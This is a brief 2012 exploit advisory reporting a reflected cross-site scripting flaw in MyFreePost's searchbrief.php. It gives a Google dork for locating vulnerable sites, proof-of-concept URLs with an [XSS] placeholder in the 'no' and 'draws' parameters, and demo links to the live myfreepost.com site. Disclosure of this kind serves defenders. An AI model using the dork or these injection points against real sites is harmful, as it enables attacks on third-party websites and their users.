MyFreePost suffers from a cross site scripting vulnerability. Note that these findings house site-specific data.
2f0eaec2c7aeecf087ddbcd9ece9c7c1fd6bf9867f72d1be7f0d9b6bb06e5373
##################################################
# Exploit Title: myfreepost (searchbrief.php) <= XSS Vulnerability
# Date: 07/10/2012
# Author: Ryuzaki Lawlet
# Web/Blog: http://justryuz.blogspot.com
# 3Mail: ryuzaki_l@y7mail.com
# Category: webapps
# Google dork: fsearchbrief.php?no=
# Tested on: Linux
+---------------------------------------------------+
[~]Exploit/p0c :
http://localhost/my4D_searchbrief.php?no=[XSS]
http://localhost/sgTOTO_freq.php?draws=[
[~] Demo
http://my.myfreepost.com/my4D_searchbrief.php?no=[xss]
http://www.myfreepost.com/lottery/index.php/us/arizonalottery/pick3/search_brief/?no=[XSS]
[~] Image
http://1.bp.blogspot.com/-OKZTASS-9R4/UHCUi4fyDPI/AAAAAAAAApY/j2593IXcj38/s1600/xss.png
+---------------------------------------------------+
Greetz to : ./CyberSEC